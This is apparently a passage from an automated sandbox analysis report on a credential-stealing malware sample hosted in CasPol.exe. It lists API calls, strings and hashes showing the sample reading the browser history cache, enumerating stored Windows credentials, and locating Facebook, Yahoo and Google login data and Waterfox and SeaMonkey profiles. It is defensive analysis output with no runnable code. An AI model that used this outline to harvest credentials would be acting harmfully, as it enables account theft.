                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                    • String ID: visited:
                                                                                                                                                                                                                    • API String ID: 2470578098-1702587658
                                                                                                                                                                                                                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 631 40e175-40e1a1 call 40695d call 406b90 636 40e1a7-40e1e5 memset 631->636 637 40e299-40e2a8 call 4069a3 631->637 639 40e1e8-40e1fa call 406e8f 636->639 643 40e270-40e27d call 406b53 639->643 644 40e1fc-40e219 call 40dd50 * 2 639->644 643->639 649 40e283-40e286 643->649 644->643 655 40e21b-40e21d 644->655 652 40e291-40e294 call 40aa04 649->652 653 40e288-40e290 free 649->653 652->637 653->652 655->643 656 40e21f-40e235 call 40742e 655->656 656->643 659 40e237-40e242 call 40aae3 656->659 659->643 662 40e244-40e26b _snwprintf call 40a8d0 659->662 662->643
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                    • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                                                                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 115830560-3916222277
                                                                                                                                                                                                                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 716 41837f-4183bf 717 4183c1-4183cc call 418197 716->717 718 4183dc-4183ec call 418160 716->718 723 4183d2-4183d8 717->723 724 418517-41851d 717->724 725 4183f6-41840b 718->725 726 4183ee-4183f1 718->726 723->718 727 418417-418423 725->727 728 41840d-418415 725->728 726->724 729 418427-418442 call 41739b 727->729 728->729 732 418444-41845d CreateFileW 729->732 733 41845f-418475 CreateFileA 729->733 734 418477-41847c 732->734 733->734 735 4184c2-4184c7 734->735 736 41847e-418495 GetLastError free 734->736 739 4184d5-418501 memset call 418758 735->739 740 4184c9-4184d3 735->740 737 4184b5-4184c0 call 444706 736->737 738 418497-4184b3 call 41837f 736->738 737->724 738->724 746 418506-418515 free 739->746 740->739 746->724
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                    • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                                                    • API String ID: 77810686-1717621600
                                                                                                                                                                                                                    • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                    • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 747 40d134-40d13b 748 40d142-40d14e 747->748 749 40d13d call 40d092 747->749 750 40d160 748->750 751 40d150-40d159 748->751 749->748 755 40d162-40d164 750->755 753 40d15b-40d15e 751->753 754 40d18d-40d19f 751->754 753->750 753->751 754->755 756 40d295 755->756 757 40d16a-40d170 755->757 760 40d297-40d299 756->760 758 40d1a1-40d1a9 757->758 759 40d172-40d18b GetModuleHandleW 757->759 762 40d1f8-40d206 call 40d29a 758->762 763 40d1ab-40d1cb wcscpy call 40d626 758->763 761 40d20b-40d214 LoadStringW 759->761 764 40d216 761->764 762->761 771 40d1cd-40d1dd wcslen 763->771 772 40d1df-40d1f6 GetModuleHandleW 763->772 767 40d218-40d227 764->767 768 40d28e-40d293 764->768 767->768 770 40d229-40d235 767->770 768->760 770->768 773 40d237-40d28c memcpy 770->773 771->764 771->772 772->761 773->756 773->768
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                      • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                      • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                    • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                                      • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                    • String ID: strings
                                                                                                                                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                    • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                                                    • API String ID: 2791114272-628097481
                                                                                                                                                                                                                    • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                    • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                    • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 697348961-0
                                                                                                                                                                                                                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                    • API String ID: 4039892925-11920434
                                                                                                                                                                                                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                    • API String ID: 4039892925-2068335096
                                                                                                                                                                                                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
